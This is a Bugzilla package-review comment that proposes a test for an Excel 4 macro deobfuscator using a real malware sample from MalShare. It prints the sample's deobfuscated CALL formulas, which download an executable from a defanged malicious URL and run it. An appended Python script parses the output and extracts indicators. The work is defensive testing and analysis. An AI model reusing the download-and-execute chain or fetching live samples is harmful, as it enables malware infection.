https://bugzilla.redhat.com/show_bug.cgi?id=2245786
--- Comment #6 from Michal Ambroz <[email protected]> ---
As this is a really specific tool, I propose here a test case to check that the
tool does what it is supposed to do.
(BEWARE!!!) It uses real malware for the test, so handle with care. The download
of the second stage is not active now, but I am still de-fanging the malicious
URL in the example below.

Test 1 is based on Didier Stevens' diary
https://isc.sans.edu/diary/Excel+4+Macro+Analysis+XLMMacroDeobfuscator/26110

1) download the malware sample from MalShare (registration needed)
https://malshare.com/sample.php?action=detail&hash=0be6ece31de89f3efb4125e086416ffc
https://malshare.com/sampleshare.php?action=getfile&hash=01558388b33abe05f25afb6e96b0c899221fe75b037c088fa60fe8bbf668f606

2) (OPTIONAL) check that it really contains the obfuscated code in the
worksheet cells (using the DidierStevensSuite).
This step is optional as this particular sample IS obfuscated and was already
publicly analyzed.
$ zipdump.py -s 5 -d 01558388b33abe05f25afb6e96b0c899221fe75b037c088fa60fe8bbf668f606.xlsx | xmldump.py celltext | grep -e CALL
BC1986,"CALL($EB$661,$AE$429,$FK$1459,0,$BB$54,$CB$1256,0,0)",0
BC1987,"CALL($BO$1913,$GM$1203,$CF$742,0,$IO$1228,$GC$1642,,0,0)",0

3) check that xlmdeobfuscator really gives the deobfuscated values
$ xlmdeobfuscator -f 01558388b33abe05f25afb6e96b0c899221fe75b037c088fa60fe8bbf668f606.xlsx | grep -e CALL
CELL:BC1986    , FullEvaluation      , CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://service.pandtelectric[.]com/fattura.exe","C:\ProgramData\jeTneVi.exe",0,0)
CELL:BC1987    , FullEvaluation      , CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","C:\ProgramData\jeTneVi.exe",,0,0)


package-review mailing list -- [email protected]
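As an added example (not part of the comment above and not code from xlmdeobfuscator), here is a small Python script that performs step 3 automatically instead of by eyeballing grep output: it parses the tool's "CELL: ..., FullEvaluation, CALL(...)" lines, treats any argument that is still a bare cell reference such as $EB$661 as "not deobfuscated", and pulls the Win32 API pairs, the download URL and the dropped file path out as defanged IOCs. The two input lines are the ones quoted in the comment (URL kept defanged as posted); the line regex, the cell-reference pattern and the hxxp/[.] defanging are my own assumptions about the output format, not documented tool behaviour.

```python
"""Automate step 3: confirm that xlmdeobfuscator resolved the CALL() cells
and extract the IOCs from its output.

Added example for this package review; not code from the bug comment or
from xlmdeobfuscator itself. It only parses the tool's textual output.
"""
import csv
import re
from io import StringIO

# The two result lines quoted in the comment, joined back onto one line each
# as the tool prints them (the mail client wrapped them). URL kept defanged.
SAMPLE_OUTPUT = r'''
CELL:BC1986    , FullEvaluation      , CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://service.pandtelectric[.]com/fattura.exe","C:\ProgramData\jeTneVi.exe",0,0)
CELL:BC1987    , FullEvaluation      , CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","C:\ProgramData\jeTneVi.exe",,0,0)
'''

# An Excel 4 cell reference such as $EB$661. If one survives as a CALL()
# argument the emulator did not resolve it and the cell is still obfuscated.
CELL_REF = re.compile(r"^\$[A-Z]{1,3}\$\d+$")
# Assumed shape of a result line: "CELL:<ref> , <status> , <formula>".
LINE = re.compile(
    r"^CELL:(?P<cell>[A-Z]+\d+)\s*,\s*(?P<status>\w+)\s*,\s*(?P<formula>.*)$")


def split_call(formula):
    """Return (name, args) for a formula like CALL("URLMON",...,0,,0).

    The csv module handles the quoted arguments so commas inside strings
    survive; an empty argument (",,") comes back as ''.
    """
    name, _, rest = formula.partition("(")
    if not rest.endswith(")"):
        raise ValueError("unbalanced formula: %r" % formula)
    args = next(csv.reader(StringIO(rest[:-1]), skipinitialspace=True))
    return name, args


def is_resolved(args):
    """True when no argument is still a bare cell reference."""
    return not any(CELL_REF.match(a) for a in args)


def parse(output):
    """Yield one record per CELL: line of xlmdeobfuscator output."""
    for raw in output.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue
        name, args = split_call(m.group("formula"))
        rec = {"cell": m.group("cell"), "status": m.group("status"),
               "function": name, "args": args,
               "deobfuscated": is_resolved(args)}
        if name == "CALL" and len(args) >= 3:
            # CALL(dll, export, type signature, ...API arguments)
            rec["dll"], rec["export"], rec["typesig"] = args[:3]
        yield rec


def defang(url):
    """Make a URL non-clickable; dots already written as [.] are left alone."""
    url = re.sub(r"^http", "hxxp", url, flags=re.I)
    return re.sub(r"(?<!\[)\.(?!\])", "[.]", url)


def iocs(records):
    """Collect API pairs, URLs and Windows paths from resolved CALL() cells."""
    found = {"apis": [], "urls": [], "paths": []}
    for r in records:
        if r["function"] != "CALL" or "dll" not in r or not r["deobfuscated"]:
            continue
        found["apis"].append("%s!%s" % (r["dll"], r["export"]))
        for a in r["args"][3:]:
            if re.match(r"https?://", a, re.I):
                found["urls"].append(defang(a))
            elif re.match(r"^[A-Za-z]:\\", a) and a not in found["paths"]:
                found["paths"].append(a)
    return found


def check(output):
    """The step-3 test: every CALL() cell is fully evaluated and resolved."""
    recs = [r for r in parse(output) if r["function"] == "CALL"]
    return bool(recs) and all(
        r["status"] == "FullEvaluation" and r["deobfuscated"] for r in recs)


if __name__ == "__main__":
    print("deobfuscated:", check(SAMPLE_OUTPUT))
    for kind, values in iocs(parse(SAMPLE_OUTPUT)).items():
        for v in values:
            print(kind, v)
```

Fed with the real output of step 3 (xlmdeobfuscator -f sample.xlsx | python3 this_script.py, after replacing SAMPLE_OUTPUT with sys.stdin.read()), check() gives a pass/fail for the package test, and the obfuscated formulas from step 2 are correctly reported as unresolved because their arguments are still $EB$661-style references.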